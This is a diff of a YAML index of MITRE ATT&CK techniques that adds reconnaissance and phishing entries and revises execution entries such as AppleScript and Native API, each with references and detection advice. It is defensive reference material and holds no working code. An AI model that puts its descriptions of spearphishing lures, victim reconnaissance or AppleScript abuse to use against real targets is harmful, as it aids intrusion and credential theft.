+ Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ id: attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:22:46.235Z'
+ created: '2020-10-02T16:49:31.262Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.002
+ url: https://attack.mitre.org/techniques/T1592/002
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Software
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:39.162Z'
+ created: '2020-10-02T16:42:17.482Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.002
+ url: https://attack.mitre.org/techniques/T1598/002
+ - source_name: Sophos Attachment
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ - source_name: GitHub Phishery
+ url: https://github.com/ryhanson/phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Attachment
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:12:48.152Z'
+ created: '2020-10-02T17:08:57.386Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Mail server
+ - Email gateway
+ x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
+ accounts receiving messages from a single unusual/unknown sender. Filtering
+ based on DKIM+SPF or header analysis can help detect when the email sender
+ is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation:
+ Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.003
+ url: https://attack.mitre.org/techniques/T1598/003
+ - source_name: TrendMictro Phishing
+ url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
+ description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
+ October 20, 2020.
+ - source_name: PCMag FakeLogin
+ url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
+ description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations
+ Staffers With Fake Login Pages. Retrieved October 20, 2020.
+ - source_name: Microsoft Anti Spoofing
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ - source_name: ACSC Email Spoofing
+ url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Link
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:13:12.752Z'
+ created: '2020-10-02T17:09:50.723Z'
+ x_mitre_contributors:
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_data_sources:
+ - Mail server
+ - Email gateway
+ x_mitre_detection: |-
+ Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
+
+ Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1598.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1598.001
+ url: https://attack.mitre.org/techniques/T1598/001
+ - source_name: ThreatPost Social Media Phishing
+ url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
+ description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
+ Pad For Phishing Attacks. Retrieved October 20, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Spearphishing Service
+ description: |-
+ Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
+
+ All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
+ id: attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T19:44:58.093Z'
+ created: '2020-10-02T17:08:07.742Z'
+ x_mitre_contributors:
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_detection: |-
+ Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1597.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1597.001
+ url: https://attack.mitre.org/techniques/T1597/001
+ - source_name: D3Secutrity CTI Feeds
+ url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
+ description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
+ Intelligence Feeds. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Threat Intel Vendors
+ description: |-
+ Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
+
+ Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:15:53.678Z'
+ created: '2020-10-02T17:03:45.918Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1595.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595.002
+ url: https://attack.mitre.org/techniques/T1595/002
+ - source_name: OWASP Vuln Scanning
+ url: https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning
+ description: OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Vulnerability Scanning
+ description: |-
+ Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
+
+ These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:58:06.761Z'
+ created: '2020-10-02T16:55:16.047Z'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.002
+ url: https://attack.mitre.org/techniques/T1596/002
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: WHOIS
+ description: |-
+ Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
+
+ Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:20:43.941Z'
+ created: '2020-10-02T16:56:49.744Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
atomic_tests: []
execution:
T1059.002:
@@ -43149,6 +50945,14 @@ execution:
url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
description: Apple. (2016, January 25). Introduction to AppleScript Language
Guide. Retrieved March 28, 2020.
+ - source_name: SentinelOne AppleScript
+ url: https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
+ description: Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript
+ For Attacking macOS. Retrieved July 17, 2020.
+ - source_name: SentinelOne macOS Red Team
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
- url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/
description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs.
Retrieved July 8, 2017.
@@ -43158,25 +50962,32 @@ execution:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: AppleScript
description: |-
- Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
+ Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
- osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
+ Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
- Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
+ AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
+
+ Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
id: attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-04-14T13:28:17.696Z'
+ modified: '2020-08-03T21:40:51.878Z'
created: '2020-03-09T14:07:54.329Z'
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Phil Stokes, SentinelOne
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- x_mitre_detection: Monitor for execution of AppleScript through osascript that
- may be related to other suspicious behavior occurring on the system.
+ x_mitre_detection: |-
+ Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
+
+ Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
x_mitre_data_sources:
+ - API monitoring
- Process monitoring
- Process command-line parameters
x_mitre_platforms:
@@ -43412,7 +51223,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-06-25T03:32:51.380Z'
+ modified: '2020-10-22T16:43:39.362Z'
created: '2017-05-31T21:30:49.546Z'
x_mitre_is_subtechnique: false
x_mitre_remote_support: false
@@ -43422,6 +51233,7 @@ execution:
- Linux
- macOS
- Windows
+ - Network
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -43433,7 +51245,7 @@ execution:
- PowerShell logs
- Process monitoring
- Process command-line parameters
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1559.001:
technique:
@@ -44004,13 +51816,14 @@ execution:
atomic_tests: []
T1559:
technique:
- created: '2020-02-12T14:08:48.689Z'
- modified: '2020-03-28T19:34:47.546Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- type: attack-pattern
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1559
+ url: https://attack.mitre.org/techniques/T1559
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
share data, communicate with each other, or synchronize execution. IPC is
@@ -44022,28 +51835,27 @@ execution:
or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).
Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,
may also leverage underlying IPC mechanisms."
- name: Inter-Process Communication
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
- or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ modified: '2020-03-28T19:34:47.546Z'
+ created: '2020-02-12T14:08:48.689Z'
x_mitre_data_sources:
- Process monitoring
- DLL monitoring
- File monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ - SYSTEM
+ x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
+ or spawned processes that are associated with abuse of IPC mechanisms.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1059.007:
technique:
@@ -44618,17 +52430,14 @@ execution:
atomic_tests: []
T1106:
technique:
- id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Native API
- description: |-
- Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
-
- Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
-
- Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
-
- Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
+ created: '2017-05-31T21:31:17.472Z'
+ modified: '2020-07-01T16:19:54.646Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1106
@@ -44675,21 +52484,26 @@ execution:
- source_name: macOS Foundation
url: https://developer.apple.com/documentation/foundation
description: Apple. (n.d.). Foundation. Retrieved July 1, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-07-01T16:19:54.646Z'
- created: '2017-05-31T21:31:17.472Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_remote_support: false
- x_mitre_permissions_required:
- - User
+ description: |-
+ Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
+
